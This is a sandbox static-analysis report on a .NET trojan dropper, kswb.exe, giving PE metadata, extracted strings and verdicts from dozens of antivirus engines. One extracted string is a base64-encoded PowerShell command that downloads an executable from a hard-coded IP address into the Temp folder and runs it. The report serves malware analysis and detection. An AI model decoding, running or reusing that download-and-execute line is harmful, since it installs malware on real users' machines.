popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2021-09-02 18:44:07

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x000006c4 0x00000800 4.20514974025
.rsrc 0x00004000 0x000004d0 0x00000600 3.68963852556
.reloc 0x00006000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x000040a0 0x0000023c LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x000042e0 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain
!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<Module>
kswb.exe
Program
mscorlib
System
Object
System.Runtime.InteropServices
GuidAttribute
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
System.Diagnostics
ProcessStartInfo
set_FileName
System.Text
Encoding
get_ASCII
Convert
FromBase64String
GetString
set_Arguments
ProcessWindowStyle
set_WindowStyle
Process
$8e17417f-8891-49fe-b053-4267b9a2ba98
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
L2MgcG93ZXJzaGVsbCAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vMTk4LjIzLjI1MS4xMDkva3N3Yi92YmMuZXhlJywgJyVUZW1wJVxcdmJjLmV4ZScpICYgcG93ZXJzaGVsbCBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAnJVRlbXAlXFx2YmMuZXhlJyAmIGV4aXQ=
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
kswb.exe
LegalCopyright
OriginalFilename
kswb.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0
Antivirus Signature
Bkav Clean
Lionic Trojan.MSIL.Nitol.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Clean
FireEye Generic.mg.9ac22682b4c95a59
CAT-QuickHeal Clean
McAfee AgentTesla-FDCM!9AC22682B4C9
Cylance Unsafe
VIPRE Clean
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Clean
BitDefender Clean
K7GW Clean
CrowdStrike win/malicious_confidence_80% (W)
Baidu Clean
Cyren Clean
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of MSIL/Kryptik.ACOO
APEX Malicious
Paloalto generic.ml
ClamAV Clean
Kaspersky HEUR:Trojan.MSIL.Nitol.gen
Alibaba Trojan:MSIL/Nitol.0fbcf4c4
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Clean
TACHYON Clean
Emsisoft Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Win32.Generic.xz
CMC Clean
Sophos Mal/Generic-S
Ikarus Win32.Outbreak
GData Clean
Jiangmin Clean
Webroot W32.Trojan.Gen
Avira Clean
Antiy-AVL Clean
Kingsoft Win32.Troj.Undef.(kcloud)
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.MSIL.Nitol.gen
Microsoft Trojan:Win32/Wacatac.B!ml
Cynet Clean
AhnLab-V3 Clean
Acronis Clean
BitDefenderTheta Gen:NN.ZemsilF.34126.am0@aSX1Mdd
ALYac Clean
MAX Clean
VBA32 Clean
Malwarebytes Clean
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Msil.Trojan.Nitol.Hwwg
Yandex Clean
SentinelOne Static AI - Malicious PE
eGambit Unsafe.AI_Score_97%
Fortinet MSIL/Kryptik.ACOO!tr
Cybereason malicious.0ed200
Avast Clean
MaxSecure Trojan.Malware.300983.susgen
No IRMA results available.